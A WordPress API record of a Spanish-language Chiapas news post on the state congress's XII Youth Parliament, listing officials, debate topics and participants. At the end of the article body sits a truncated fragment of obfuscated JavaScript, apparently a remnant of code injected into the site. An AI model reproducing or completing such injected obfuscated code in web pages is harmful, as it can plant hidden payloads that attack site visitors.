{"id":3916,"date":"2022-07-27T00:52:39","date_gmt":"2022-07-27T00:52:39","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=3916"},"modified":"2022-07-27T00:52:40","modified_gmt":"2022-07-27T00:52:40","slug":"congreso-del-estado-lleva-a-cabo-xii-parlamento-juvenil-jacinto-perez-arias","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=3916","title":{"rendered":"Congreso del Estado lleva a cabo XII Parlamento Juvenil: \u201cJacinto P\u00e9rez Arias\u201d"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"586\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/07\/IMG-20220726-WA0046-1024x586.jpg\" alt=\"\" class=\"wp-image-3917\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/07\/IMG-20220726-WA0046-1024x586.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/07\/IMG-20220726-WA0046-300x172.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/07\/IMG-20220726-WA0046-768x440.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/07\/IMG-20220726-WA0046.jpg 1280w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>\u2022 Las y los j\u00f3venes que participaron en este ejercicio parlamentario debatieron y presentaron iniciativas sobre diversas materias.<\/p>\n\n\n\n<p>\u2022 Con este tipo de actividades se generan espacios de expresi\u00f3n, se promueve la participaci\u00f3n social y pol\u00edtica de los j\u00f3venes en materia legislativa. <\/p>\n\n\n\n<p>Tuxtla Guti\u00e9rrez, Chiapas a 26 de julio de 2022.- La Comisi\u00f3n de Juventud y Deporte del Congreso del Estado que preside el diputado Cuauht\u00e9moc Manuel Hern\u00e1ndez G\u00f3mez, en coordinaci\u00f3n con Getseman\u00ed Moreno Mart\u00ednez directora del Instituto de la Juventud, llev\u00f3 a cabo el XII Parlamento Juvenil: \u201cJacinto Arias P\u00e9rez\u201d, con el objetivo de generar espacios de expresi\u00f3n, promover la participaci\u00f3n social y pol\u00edtica de los j\u00f3venes en materia legislativa.Al dar la bienvenida a los participantes, la diputada  Mar\u00eda De los \u00c1ngeles Trejo Huerta presidenta de la Mesa Directiva, pidi\u00f3 a los participantes en el Parlamento Juvenil  no perder nunca el inter\u00e9s de seguir capacit\u00e1ndose, fortaleci\u00e9ndose, para ser ejemplo de otros j\u00f3venes y que los trabajos realizados ayuden a reconocer los problem\u00e1ticas y necesidades de nuestra sociedad.La directora del Instituto de la Juventud, Getseman\u00ed Moreno, agradeci\u00f3, no solamente la participaci\u00f3n de los j\u00f3venes, ya que tambi\u00e9n reconoci\u00f3 el trabajo y apoyo de las autoridades municipales, estatales y federales. Los j\u00f3venes deben elevar su voz, -dijo- para que sus propuestas y demandas se hagan una ley que beneficie a amplios sectores.En su participaci\u00f3n, el diputado Cuauht\u00e9moc Manuel Hern\u00e1ndez G\u00f3mez presidente de la Comisi\u00f3n de Juventud destac\u00f3 que la participaci\u00f3n de los j\u00f3venes en la vida p\u00fablica, fomenta la libre expresi\u00f3n y ofrece un espacio donde las nuevas generaciones puedan generar propuestas y pol\u00edticas p\u00fablicas que abonan al desarrollo de Chiapas. El poder Legislativo es un espacio plural e incluyente, dijo, y reiter\u00f3 que cada una de las propuestas que se emitieron ser\u00e1n analizadas por las comisiones parlamentarias. Las y los diputados que participaron en este ejercicio parlamentario debatieron y presentaron iniciativas sobre diversas materias: Salud, seguridad, trabajo, medio ambiente, derechos de los animales, crisis clim\u00e1tica, educaci\u00f3n, derechos humanos, igualdad sustantiva, inclusi\u00f3n, derechos de los pueblos ind\u00edgenas y democracia participativa entre otros.Integraron el Parlamento Juvenil: David Alfaro Solar; Nicol\u00e1s Aquino Zucker; Norberto Bola\u00f1os Escobar; Alberto Adri\u00e1n Cadenas Bassoul, Luis Fernando Campos Pedrero; Luz Mar\u00eda Castillo Moreno; Vicente de Jes\u00fas Arroyo; Liliana del Carmen Constantino Balbuena; Jorge Daniel de Le\u00f3n Ruiz; Carlos De los Santos Arroniz; B\u00e1rbara Camila Esponda Palacios, Manuel de Jes\u00fas Garc\u00eda Alfaro; Alexa Garc\u00eda Gonz\u00e1lez; Wilber Alberto Guti\u00e9rrez Trujillo; Jes\u00fas Emmanuel Hern\u00e1ndez D\u00edaz; Marco Antonio Jim\u00e9nez Cabrera; Juan Salvador Le\u00f3n G\u00f3mez, Pedro Antonio L\u00f3pez Hern\u00e1ndez; Luis Fernando L\u00f3pez Rodr\u00edguez; Miguel \u00c1ngel L\u00f3pez V\u00e1zquez; Diego Loyo Maldonado; Montserrat Mandujano L\u00f3pez; Silvana Mart\u00ednez Torres; Juan Carlos Maza Morales; Edgar Eduardo Megchun Vel\u00e1zquez; Nallely Cristel M\u00e9ndez Ozuna; Mariana Argentina Mendiola Guerrero; Alfonso Mendoza Morales; Jos\u00e9 Luis Morales Herrera; Abner Miguel Moreno Arcos; Carolina Moscoso Rodr\u00edguez; Orestes Pereyra Solar; Selene P\u00e9rez Moreno; Indira P\u00e9rez Toledo; Jes\u00fas Pineda Flores; C\u00e9sar Ulises S\u00e1nchez P\u00e9rez; Norma Alejandra S\u00e1nchez Guzm\u00e1n; Daniel Sol\u00f3rzano L\u00f3pez; Alejandro Toledo Hidalgo; Norberto Rub\u00e9n Torres Castillejos.Asistieron los diputados: Yamil Melgar Bravo, presidente de la Junta de Coordinaci\u00f3n Pol\u00edtica (JUCOPO); Carolina Zuarth Ramos, Lina Nango Molina, Petrona de la Cruz Cruz; adem\u00e1s de la diputada federal Adriana Bustamante Castellanos, as\u00ed mismo, Azucena Arreola Trinidad, directora estatal del Programa J\u00f3venes Construyendo el Futuro; y el Dr. Jacinto Arias P\u00e9rez, homenajeado.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u2022 Las y los j\u00f3venes que participaron en este ejercicio parlamentario debatieron y presentaron iniciativas sobre diversas materias. \u2022 Con este tipo de actividades se generan espacios de expresi\u00f3n, se promueve la participaci\u00f3n social y pol\u00edtica de los j\u00f3venes en materia legislativa. Tuxtla Guti\u00e9rrez, Chiapas a 26 de julio de 2022.- La Comisi\u00f3n de Juventud &hellip;<\/p>\n","protected":false},"author":2,"featured_media":3917,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-3916","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/3916","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3916"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/3916\/revisions"}],"predecessor-version":[{"id":3918,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/3916\/revisions\/3918"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/3917"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3916"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3916"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3916"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}